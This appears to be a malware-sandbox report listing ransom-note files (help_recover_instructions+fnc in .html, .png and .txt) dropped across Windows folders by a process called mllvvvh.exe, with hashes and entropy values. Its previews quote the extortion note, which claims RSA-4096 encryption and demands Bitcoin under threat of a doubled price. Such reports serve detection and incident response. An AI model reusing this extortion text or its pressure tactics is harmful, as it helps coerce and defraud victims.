                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):948528
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZCh
                  MD5:C9AA9DDD1AFF5A6EA3CF776957B2986D
                  SHA1:A1C3B4885A645E1D8880ABD6ECD4AA7884F0E06C
                  SHA-256:857E1A815ACDB383FBE05B8FC4D7A24E32D78D502B1F755907A7EB642E6959B8
                  SHA-512:CC26C554FAEDA944C8BC3EB71A75D76626934B338C4C7187C6A336047159C4E07557CE48FB959886A954D445173783E0A34EABE67656B84E77A5D2674DCC06A9
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):29358
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:47DEFD617E5BA855EA5310C50841E04C
                  SHA1:0DDB4EB33A385C7C27ADCEA7F42C0AA5203D26D9
                  SHA-256:DD6FD0C93E7D155358EECDB7D866F474851E7D96F027AF4BB66541AF524746A9
                  SHA-512:E2E922947B53B32E9B7C47A11B7BE1BAA316620C21AD7DB17927F19FB3445EBA78243E4D96115BB3D12F5CCC88758B6A5E1E23F242A2DD42C000F4F1235F3E4B
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):117840
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:70F73D780A4E5A3D45E6026BB66D83E3
                  SHA1:ED41B79F22D5D319EF4A62742644920286BA4A8C
                  SHA-256:0F968FB6B42FE42816E2ECAAFF6914C65624A7D5E550E2F9518CD13C91862FBC
                  SHA-512:522D8505A2E34F0E925962A0225CD0132D6E2FE7CBE182DDEE797F2B9D3AF49AF128D6BE866B70C1548DD57CAC820E6AE4BADEF85FDE672632D2979A76E64C5A
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1016280
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZCu
                  MD5:7ACBA25A5B87828C3CDE396FF8FBB1C5
                  SHA1:81124943F3D73A96DD260ACF800641D3B5935A88
                  SHA-256:41D65253CDD27829CB391175573B6FA683E685EC0DF595CFA093706AA0A6924E
                  SHA-512:6B24D2B336B12C7855F7296A5DC36516D3E25E5DDBDEB154E761AD38528C71D39A94B36801B1B1072404A4BA4E8A30D914ECC829495ADDEB6E9A79AE3CB72BF3
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31455
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6FEDBC0B5455746EC9C94454F3D43FE5
                  SHA1:56D3C2E4E25E674280ACFC29588D5A486AAEE8FD
                  SHA-256:F6E0F552BA3084A2AA7E7F786216493CFB90C81357AA2F085EC225FE6F2F21B4
                  SHA-512:A7F362AEF672F1EDFE48CC858324563D0D2110E90388F863F90586E6D7694C1DBB80D3651F5577416AAFD429C9BA4362976BBDA9F2CA9010F2D5309F139429C4
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Templates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):117840
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:70F73D780A4E5A3D45E6026BB66D83E3
                  SHA1:ED41B79F22D5D319EF4A62742644920286BA4A8C
                  SHA-256:0F968FB6B42FE42816E2ECAAFF6914C65624A7D5E550E2F9518CD13C91862FBC
                  SHA-512:522D8505A2E34F0E925962A0225CD0132D6E2FE7CBE182DDEE797F2B9D3AF49AF128D6BE866B70C1548DD57CAC820E6AE4BADEF85FDE672632D2979A76E64C5A
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Templates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1016280
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZCu
                  MD5:7ACBA25A5B87828C3CDE396FF8FBB1C5
                  SHA1:81124943F3D73A96DD260ACF800641D3B5935A88
                  SHA-256:41D65253CDD27829CB391175573B6FA683E685EC0DF595CFA093706AA0A6924E
                  SHA-512:6B24D2B336B12C7855F7296A5DC36516D3E25E5DDBDEB154E761AD38528C71D39A94B36801B1B1072404A4BA4E8A30D914ECC829495ADDEB6E9A79AE3CB72BF3
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Templates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31455
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6FEDBC0B5455746EC9C94454F3D43FE5
                  SHA1:56D3C2E4E25E674280ACFC29588D5A486AAEE8FD
                  SHA-256:F6E0F552BA3084A2AA7E7F786216493CFB90C81357AA2F085EC225FE6F2F21B4
                  SHA-512:A7F362AEF672F1EDFE48CC858324563D0D2110E90388F863F90586E6D7694C1DBB80D3651F5577416AAFD429C9BA4362976BBDA9F2CA9010F2D5309F139429C4
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6232e\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6232e\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
